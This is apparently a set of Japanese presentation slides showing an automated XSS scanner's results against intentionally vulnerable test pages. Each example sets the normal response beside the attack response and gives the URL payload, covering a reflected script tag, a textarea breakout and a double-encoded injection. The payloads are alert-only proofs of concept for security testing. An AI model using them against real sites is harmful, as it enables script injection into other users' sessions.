18. 実行例①: 正常時
MBSD
<!doctype html><html><head><title>Full Javascript Injection
(full.1)</title></head><body>
Hello!<BR>
The value of cgi parameter "in" is: xxx
</body></html>
http://xxx.jp/full1?in=xxx
出力箇所:HTMLタグの外
入力制限:なし
19. 実行例①: 攻撃時
MBSD
<!doctype html><html><head><title>Full Javascript Injection
(full.1)</title></head><body>
Hello!<BR>
The value of cgi parameter "in" is: M75uhmid=''
mulenpedistor<script>alert(3122);</script>HFZ4R
</body></html>
http://xxx.jp/full1?in=M75uhmid=''
mulenpedistor<script>alert(3122);</script>HFZ4Rxx
試行回数:1回
20. 実行例②: 正常時
MBSD
<!doctype html><html><head><title>Reflected XSS in textarea
(textarea1)</title></head><body>
<H2>Textarea injection test</H2>
This test requires a closing textarea tag to break out of the field context and
trigger a subsequent exploit.
<p>
<FORM>
<textarea name="in" rows="5" cols="60">xxx</textarea>
<p>
<INPUT type="Submit">
・・・
http://xxx.jp/textarea1?in=xxx
出力箇所:textareaタグで囲まれた箇所
入力制限:なし
21. 実行例②: 攻撃時
MBSD
<!doctype html><html><head><title>Reflected XSS in textarea
(textarea1)</title></head><body>
<H2>Textarea injection test</H2>
This test requires a closing textarea tag to break out of the field context and
trigger a subsequent exploit.
<p>
<FORM>
<textarea name="in" rows="5"
cols="60">V9vyQ</textarea><script>alert(3122);</script>zU9qL</textar
ea>
<p>
<INPUT type="Submit">
http://xxx.jp/textarea1?in=V9vyQ</textarea><script>alert(3122);
</script>zU9qL
試行回数:1回
22. 実行例③: 正常時
MBSD
<!doctype html><html><head><title>Double-Encoded tags injection
(doubq.1)</title></head><body>
Hello!<BR>
The value of the cgi parameter "in" is: xxx
<p>
This test echos unencoded version of double-encoded tags.
</body></html>
http://xxx.jp/doubq1?in=xxx
出力箇所:HTMLタグの外
入力制限:あり(2重デコード)
23. 実行例③: 攻撃時
MBSD
<!doctype html><html><head><title>Double-Encoded tags injection
(doubq.1)</title></head><body>
Hello!<BR>
The value of the cgi parameter "in" is: ueGD9ahdtin=''
tligk=''><<script>alert(3122);</script>bK12w
<p>
This test echos unencoded version of double-encoded tags.
</body></html>
http://xxx.jp/doubq1?in=ueGD9ahdtin%253D%2527%2527%2520tl
igk%253D%2527%2527%253E%253C%253Cscript%253Ealert%25
283122%2529%253B%253C/script%253EbK12w
試行回数:5回